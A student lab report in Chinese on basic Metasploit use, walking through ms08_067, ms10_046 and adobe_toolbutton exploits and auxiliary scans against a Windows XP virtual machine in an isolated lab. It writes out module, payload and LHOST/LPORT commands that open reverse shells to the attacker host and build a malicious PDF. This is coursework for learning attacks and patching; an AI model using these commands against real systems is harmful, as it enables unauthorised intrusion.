Exp5 MSF基礎應用 20154302 薛師凡
Exp5 MSF基礎應用
20154302 薛師凡
一、基礎問題回答
(1)用自己的話解釋什麽是 exploit , payload , encode.
exploit:
是破除門鎖的工具以及運送間諜的載具,相當於利用漏洞偷偷打開的管道,將做好的木馬病毒等順利傳輸到靶機。
payload:
就是被運送的間諜,到了房子裏頭就可以執行各種間諜活動。簡單來說就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,然後通過管道傳輸進去後開始為我們控制靶機服務。
encode:
是間諜穿的偽裝的衣服,便於間諜潛入目標針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特征,但是不改變payload為我們所用的特征,但能對payload進行加工。
二、實踐過程
本次試驗共分為四個部分:
1.一個主動攻擊實踐,ms08_067
2.一個針對瀏覽器的攻擊,ms10_046漏洞攻擊
3.一個針對客戶端的攻擊,adobe_toolbutton
4.成功應用任何一個輔助模塊scanner/postscan/tcp
和gather blowser_info
實驗環境:
攻擊機:kali:192.168.238.131
靶機:Windows:192.168.238.130
2.1主動攻擊:ms08_067
先百度一下ms08_067漏洞的意思
參考學長的報告得知英文版XP才可以進行漏洞攻擊
1.首先查看兩個主機的IP地址
2.先msfconsole,再kali主機鍵入search ms08_067 查看漏洞信息
鍵輸入use exploit/windows/smb/ms08_067_netapi,
3.然後鍵入show payloads查看需要的payload
此處首先從眾地輸入了set payload generic/shell_reverse_tcp選擇病毒模塊
show options查看需要的信息,進行相應設置
4.鍵入show targets查看適用的靶機版本,可以set target 0自動選擇
5.設置好以後輸入exploit進行攻擊。
連接不上靶機,攻擊失敗
然後各種失敗
然後又互相ping一下,發現WinXP可以ping通kali,但是kali卻ping不通WinXP,
,果斷關閉防火墻,現在可以ping通了。
再進行攻擊,還是失敗,於是無奈之下選擇了更換病毒模塊。
終於成功了!
2. 對瀏覽器攻擊:ms10_046漏洞攻擊
基本步驟還是和上面一樣,先利用search ms10_046指令查看可以運用的攻擊模塊:
用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用該模塊,再使用show payloads查看可以供我們使用的payload:
然後查看需要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
set LHOST 192.168.238.131
set SRVHOST 192.168.238.131
使用exploit指令執行漏洞,可以看到生成了一個url,在靶機的IE瀏覽器上使用該url進行訪問,
又失敗了幾次,
換了病毒模塊
在MSF終端看見漏洞執行成功:
使用sessions指令查看當前存在的會話,可以看到存在一個ID為1的會話:
使用sessions -i 1選擇會話1,成功獲取了靶機的shell,利用systeminfo指令查看靶機的系統信息:
3. 對Adobe的漏洞攻擊:adobe_toolbutton
先使用search adobe查詢和adobe漏洞有關的模塊,我選擇的是use exploit/windows/fileformat/adobe_toolbutton,然後使用該模塊,設置回連的payload:
set LHOST 192.168.238.131
set LPORT 4302
set FILENAME 20154302.pdf
設置:
設置好相應參數後,開始實施攻擊,發現在/root/.msf4/local/目錄下成功生成了一個lxm.pdf文件:
use exploit/multi/handler
set payload generic/shell_reverse_tcp windows/meterpreter/reverse_tcp
然後將該文件傳送到靶機上,並且在攻擊機上打開監聽:
將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:
4、輔助模塊應用
輔助模塊真的好多啊
這裏我用了scanner/postscan/tcp模塊
查看其設置的參數
設置好之後,掃描
好像是失敗了
更改了設置,好像也沒有用
我之後換了gather blowser_info,這是一個通過過網站訪問來搜集計算機信息的輔助
info查看要設置的參數,設置好,這次成功了,可以看到系統的信息
三、實驗體會
本次實驗讓我又一次認識了MSF,功能真的強大,
這次實驗我們的攻擊對象只是XP系統的虛擬機,比較有局限性,隨著網絡攻擊技術的進步,我們更應該學會漏洞的掃描和分析,以及及時的去打好補丁。本次實驗從第一個開始就十分不順利,屢次失敗,通過調試網絡和更換病毒模塊最終取得成功,總體來說還是收獲頗豐,而且還磨練了自己的耐心。
Exp5 MSF基礎應用 20154302 薛師凡